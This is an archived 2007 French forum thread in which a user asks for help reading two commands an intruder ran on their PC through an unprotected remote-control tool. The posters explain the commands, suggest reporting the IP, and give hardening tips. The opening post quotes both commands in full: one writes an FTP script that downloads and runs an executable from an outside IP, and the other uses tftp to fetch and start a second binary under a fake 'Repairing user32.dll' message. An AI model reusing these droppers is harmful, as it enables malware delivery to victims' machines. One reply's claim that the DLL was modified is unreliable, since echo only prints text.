Posté(e) le 1 mai 200718 a Bonjour à tous, J'avais installé il y a quelque temps un outils permettant de prendre le controle de mon PC a distance, et malin comme je suis j'ai oublié de le désinstaller :( Du coup ce matin j'ai vu des fenetres s'ouvrir toutes seuls, et lorsque j'ai regardé mon historique de la commande "executer", voici ce que j'ai trouvé : cmd.exe /c del i&echo open 82.225.22.145 25276 > i&echo user 1 1 >> i &echo get 671.exe >> i &echo quit >> i &ftp -n -s:i &671.exe&del i&exit et %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET xkmgsaf.exe & start xkmgsaf& Je m'en suis apercu a ce moment la, et j'ai tout bloqué, puis désactivé mon outils de controle a distance... Quelqu'un saurais décrypter ce que le hackeur a voulu faire ? Merci d'avance !
Posté(e) le 1 mai 200718 a Il a voulu récupérer un fichier (671.exe) sur un ftp (82.225.22.145 25276) et l'exécuter... Pour la 2ème commande, je ne sais pas. Quelqu'un d'autre que vous à eu exactement le même soucis il y a quelques semaines!! On ne saurait trop le rappeler... Quand on installe un logiciel de prise de controle à distance, protegez le au moins par un mot de passe (complexe)!!!
Posté(e) le 1 mai 200718 a Hum, c'est plus du windows que du réseau, mais bon... -Pour la première on dirait qu'il ouvre une connection pour télécharger un binaire windows et l'execute (surement un trojan ou autre...). -Pour la deuxième on dirait qu'il fait la même chose mais d'une façon différente (et un autre bianire)
Posté(e) le 1 mai 200718 a Attention l'IP en question est un abonné Free mne69-3-82-225-22-145.fbx.proxad.net (c'est à Lyon) Envoyez de suite un mail à abuse@free.fr en expliquant tout, le type va se faire calmer...
Posté(e) le 1 mai 200718 a Attention l'IP en question est un abonné Free mne69-3-82-225-22-145.fbx.proxad.net (c'est à Lyon)Envoyez de suite un mail à abuse@free.fr en expliquant tout, le type va se faire calmer... Ca peut aussi etre un bot ...
Posté(e) le 1 mai 200718 a Auteur Merci à tous pour vos réponses... Je vais effectivement envoyer un mail à Free, on ne sais jamais Sinon comment puis-je savoir si j'ai actuellement des ports ouverts ? J'ai le firewall de windows qui s'est déclenché, mais peut etre que ce n'est pas le meilleur... vous pourriez m'en recommander un (de preference gratuit) :)
Posté(e) le 2 mai 200718 a Attention l'IP en question est un abonné Free mne69-3-82-225-22-145.fbx.proxad.net (c'est à Lyon)Envoyez de suite un mail à abuse@free.fr en expliquant tout, le type va se faire calmer... Ca peut aussi etre un bot ... Aucune importance, il doit être prévenu qu'il est soit : - Infecté - Idiot @kyro : perdu, je suis sur PAR69, et lui sur MNE69
Posté(e) le 2 mai 200718 a Sinon comment puis-je savoir si j'ai actuellement des ports ouverts ? J'ai le firewall de windows qui s'est déclenché, mais peut etre que ce n'est pas le meilleur... vous pourriez m'en recommander un (de preference gratuit) :) cmd -> netstat -a -> liste des ports ouverts kerio personal firewall
Posté(e) le 2 mai 200718 a Auteur On vient de me dire que dans sa tentative le hackeur a modifié une DLL système user32.dll, et que "c'est mort, si il a subilisé certaines DLL systemes, tu pourras utiliser n'importe quel logiciel de securité, son fonctionnement sera faussé parce que le systeme n'interpretera pas les commandes correctement, puisque le fonctionnement du coeur du systeme est altéré" Qu'en pensez vous ?
Posté(e) le 2 mai 200718 a je ne sais pas puisque je n'ai pas d information sur le temps entre ca commande et la coupure du logiciel de partage. Dans le doute tu format
Posté(e) le 2 mai 200718 a tu peux toujours essayer de passer ta freebox en mode routeur :) ( avec les modifications que cela entraine - ouverture de ports etc ... ) ainsi les tentatives de piratages via trojan etc .. n'aboutiront pas
Posté(e) le 2 mai 200718 a tu peux toujours essayer de passer ta freebox en mode routeur :) ( avec les modifications que cela entraine - ouverture de ports etc ... )ainsi les tentatives de piratages via trojan etc .. n'aboutiront pas sauf si les port du vnc like sont ouvert pour pouvoir le prendre depuis internet au quel ca bah ca revien au meme mais bon c clair mode router on ! always !
Posté(e) le 2 mai 200718 a Auteur Je suis déjà en mode routeur... Je pense que now vu que le VNC server est désinstallé je crains plus rien de ce coté la, c'est au niveau des modifs qu'il a fait que ca me fait peur.
Posté(e) le 2 mai 200718 a %comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 69.157.107.38 GET xkmgsaf.exe & start xkmgsaf& Reparation par redondance du user32.dll et injection 'xkmgsaf.exe' avec démarrage du ledit xkmgsaf.exe .... Bref il a bien trafiqué ta dll par un truc concocté par lui (xkmgsaf.exe, même sur google il n'y a pas de référence à cet exe ...) donc si j'etait toi ... format ou reparation de la partition windows
Posté(e) le 2 mai 200718 a Euh j'y connais rien "script" windows, mais "echo Repairing user32.dll" ça ne fait pas qu'afficher "Repairing user32.dll" ?
Posté(e) le 2 mai 200718 a Auteur Pas moyen de remettre la DLL d'origine ? en la copiant à partir d'un autre PC par exemple ?
Archivé
Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.